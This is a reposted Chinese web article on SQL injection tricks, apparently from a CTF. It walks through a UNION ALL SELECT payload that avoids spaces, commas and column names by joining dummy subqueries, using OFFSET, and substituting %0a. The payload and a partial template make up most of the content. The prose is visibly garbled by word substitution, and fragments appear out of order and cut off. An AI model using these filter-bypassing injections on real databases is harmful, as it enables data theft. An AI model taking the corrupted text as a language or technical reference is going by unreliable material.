作家
登录

关于SQL注入的一些技巧分享

作者: 来源: 2017-09-20 17:02:42 阅读 我要评论

 (    
  •             SELECT * FROM (SELECT 1)u JOIN (SELECT 2)i JOIN (SELECT 3)o JOIN (SELECT 4)r     
  •             UNION     
  •             SELECT * FROM NEWS LIMIT 1 OFFSET 4    
  •         )F    
  •     )b    JOIN (SELECT 3)c JOIN (SELECT 4)d    
  •  
  • 先上一道ctf题的payload进行分析:

    1. -1 UNION ALL SELECT * FROM ((SELECT 1)a JOIN (SELECT F.4 from (SELECT * FROM (SELECT 1)u JOIN (SELECT 2)i JOIN (SELECT 3)o JOIN (SELECT 4)r UNION SELECT * FROM NEWS LIMIT 1 OFFSET 4)F)b JOIN (SELECT 3)c JOIN (SELECT 4)d) 

    这本是一道ctf题,前面估计是where后面的子句。这道题过滤了三样器械:1、空格,2、逗号,3、字段名

    这里不具体说绕过,办法很多,空格应用%0a绕过,union指令中的逗号应用join绕过,limit指令中的逗号应用offset绕过。

    这里因为payload中不克不及出现字段名,是以我们创建了一个与所查表字段数雷同的虚拟表并对其并将其萌芽结不雅与前面的萌芽union起来。具体来说是如许:

    -- 比如说袈溱原萌芽的第二字段处出数据

    1. ... where ...     
    2. union all    
    3. select * from(    
    4.     (select 1)a join(    
    5.         select F.[须要萌芽的字段号] from(    
    6.             select * from [须要萌芽的表有若干个字段就join若干个]    
    7.             union    

        推荐阅读

        智能建筑中弱电智能化系统的设计分析

      【沙龙】51CTO诚邀您9月23号和多位技巧大年夜咖一路聊智能CDN的优化之路,抓紧时光哦! 一、弱电智能化的内涵在>>>详细阅读


      本文标题:关于SQL注入的一些技巧分享

      地址:http://www.17bianji.com/lsqh/37551.html

    关键词: 探索发现

    乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

    网友点评
    自媒体专栏

    评论

    热度

    精彩导读
    栏目ID=71的表不存在(操作类型=0)